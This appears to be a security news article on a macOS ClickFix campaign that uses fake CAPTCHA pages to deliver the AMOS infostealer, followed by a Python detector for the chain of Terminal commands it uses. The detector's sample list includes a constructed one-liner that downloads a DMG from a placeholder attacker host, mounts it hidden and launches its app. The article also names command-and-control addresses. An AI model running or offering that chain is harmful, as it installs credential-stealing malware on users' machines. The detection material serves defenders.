New macOS ClickFix attack mounts DMGs silently to deliver infostealer

A fresh macOS malware campaign is using fake CAPTCHA pages to trick users into running Terminal commands that silently download, mount, and launch malicious disk images. The payload is Atomic macOS Stealer, or AMOS — an infostealer that grabs browser credentials, crypto wallet data, Keychain contents, messaging app info, and user documents.

Palo Alto Networks Unit 42 first spotted the campaign. Here’s how it works: a victim lands on a page showing what looks like a CAPTCHA verification. The page tells them to open Terminal and paste a command to “verify” themselves. That command uses curl to quietly pull down a DMG file, then macOS’s built-in hdiutil to mount it without showing it in Finder. A script hunts for the first .app or .pkg inside the disk image and launches it.

What makes this campaign stand out is the combination of social engineering and silent execution. Older ClickFix attacks on Mac typically required users to manually open a DMG. This one automates the whole flow from a single Terminal paste.
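As an added example (not code from the article, Unit 42 or Palo Alto Networks), here is a small Python detector that inspects a shell-history or EDR command line for the stages described above in a single paste: a curl download of a DMG, a hidden hdiutil mount, a search for the first .app or .pkg, and a launch. The stage regexes, the sample command lines, the host and the paths are constructed assumptions; `-nobrowse` is the hdiutil attach option that keeps a mounted volume out of Finder.

```python
import re
from typing import Dict, List, Set

# Regexes for the stages of the chain described in the article. They are an
# assumption about how such a paste would look, not indicators from the campaign.
# -nobrowse is the hdiutil attach option that keeps a mounted volume out of Finder.
STAGES: Dict[str, "re.Pattern[str]"] = {
    "download": re.compile(r"\bcurl\b.*\.dmg\b"),
    "silent_mount": re.compile(r"\bhdiutil\s+(?:attach|mount)\b.*-nobrowse\b"),
    "locate_installer": re.compile(r"\bfind\b.*\.(?:app|pkg)\b"),
    "launch": re.compile(r"\bopen\b|\binstaller\s+-pkg\b"),
}

# A single paste chains its steps with &&, ;, or pipes; inspect each segment.
SEGMENT_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")

# Constructed sample lines (not captured from the real campaign): two benign
# and one mimicking the one-paste chain. Host and paths are placeholders.
SAMPLE_COMMANDS: List[str] = [
    "hdiutil attach ~/Downloads/Xcode_tools.dmg",
    "curl -fsSL https://example.com/api/status -o /tmp/status.json",
    "curl -s https://attacker.invalid/verify.dmg -o /tmp/v.dmg && "
    "hdiutil attach -nobrowse /tmp/v.dmg -mountpoint /tmp/m && "
    "open \"$(find /tmp/m -maxdepth 2 -name '*.app' -o -name '*.pkg' | head -n 1)\"",
]


def classify_stages(command: str) -> Set[str]:
    """Return the set of chain stages present in one command line."""
    found: Set[str] = set()
    for segment in SEGMENT_SPLIT.split(command):
        for name, pattern in STAGES.items():
            if pattern.search(segment):
                found.add(name)
    return found


def is_clickfix_dmg_chain(command: str, min_stages: int = 3) -> bool:
    """Flag a line that downloads a DMG and mounts it hidden in one go."""
    stages = classify_stages(command)
    # Download plus silent mount is the distinguishing pair; requiring a third
    # stage keeps a developer who merely mounts a downloaded DMG out of the alerts.
    return {"download", "silent_mount"} <= stages and len(stages) >= min_stages


def scan_history(lines: List[str]) -> List[str]:
    """Return the lines from a shell history or process log worth triaging."""
    return [line for line in lines if is_clickfix_dmg_chain(line)]
```

Feed it `~/.zsh_history` or the command-line field of process-execution events; a hit with all four stages is worth an immediate look at the mount point and whatever was launched from it.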

Once running, AMOS targets eight Chromium-based browsers — Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex — plus Firefox derivatives like LibreWolf, Tor Browser, and Waterfox. It steals cookies, login databases, autofill data, and stored payment cards. The malware also goes after crypto wallets including Exodus, Electrum, Atomic Wallet, Bitcoin Core, and several others.

Perhaps most concerning: the malware replaces legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to intercept crypto transactions. It also grabs Telegram and Discord data, Apple Notes, Safari cookies, and Keychain files.

The command-and-control servers are at svs-verificationdate[.]beer and 196.251.107[.]171. The campaign was first flagged via a Unit 42 tweet on X.

The takeaway is simple. Never paste Terminal commands from a website, especially ones claiming to be CAPTCHA verifications or browser fixes. If you don’t understand what a command does, don’t run it.
